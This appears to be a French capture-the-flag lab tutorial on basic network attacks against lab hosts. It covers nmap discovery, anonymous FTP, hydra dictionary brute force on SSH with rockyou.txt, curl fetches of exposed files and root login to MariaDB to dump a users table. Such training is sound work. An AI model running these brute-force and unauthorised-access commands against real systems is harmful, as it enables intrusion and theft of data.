Un réseau TCP/IP relie des machines grâce à des adresses IP. Avant toute attaque ou défense, il faut savoir cartographier le réseau.
ip a : Affiche les adresses IP de votre machine. nmap -sn <réseau> : Scan ping pour découvrir les hôtes actifs. nmap -sV <IP> : Détection des versions des services. Exemple : nmap -sn 172.20.1.0/24 → liste toutes les machines répondant au ping.
ip a.nmap -sn 172.20.X.0/24.nmap -sV .Le File Transfer Protocol permet de transférer des fichiers. Un serveur mal configuré peut autoriser l'accès anonyme.
ftp <IP> : Se connecter (login anonymous, mot de passe vide). ls : Lister les fichiers. get <fichier> : Télécharger un fichier. Exemple : ftp 172.20.1.20 → anonymous → ls → get fichier.txt
ftp 172.20.X.20.flag.txt.cat flag.txt.SSH permet l'administration à distance de façon sécurisée. Un mot de passe faible peut être cassé par force brute.
ssh <user>@<IP> : Tentative de connexion. hydra -l <login> -P <wordlist> ssh://<IP> : Attaque par dictionnaire. Exemple : hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://172.20.1.30
ssh root@172.20.X.30 (mot de passe aléatoire pour voir le refus).hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://172.20.X.30.Le protocole HTTP sert à consulter des sites web. Des fichiers non protégés peuvent être accessibles directement.
curl <URL> : Effectue une requête HTTP et affiche le contenu. Exemple : curl http://172.20.1.40/flag.txt
curl http://172.20.X.40.curl http://172.20.X.40/flag.txt./admin, /robots.txt pour comprendre les risques.MariaDB est un SGBD relationnel. Un compte root sans mot de passe ou avec un mot de passe faible expose toutes les données.
mysql -h <IP> -u <user> -p<pass> : Connexion au serveur. SHOW DATABASES; : Lister les bases. USE <base>; : Sélectionner une base. SELECT * FROM <table>; : Afficher les enregistrements. Exemple : mysql -h 172.20.1.50 -u root -ppassword -e "SELECT * FROM ctf.users;"
mysql -h 172.20.X.50 -u root -ppassword.ctf et la table users.users. Notez le flag.Terminez tous les ateliers pour débloquer.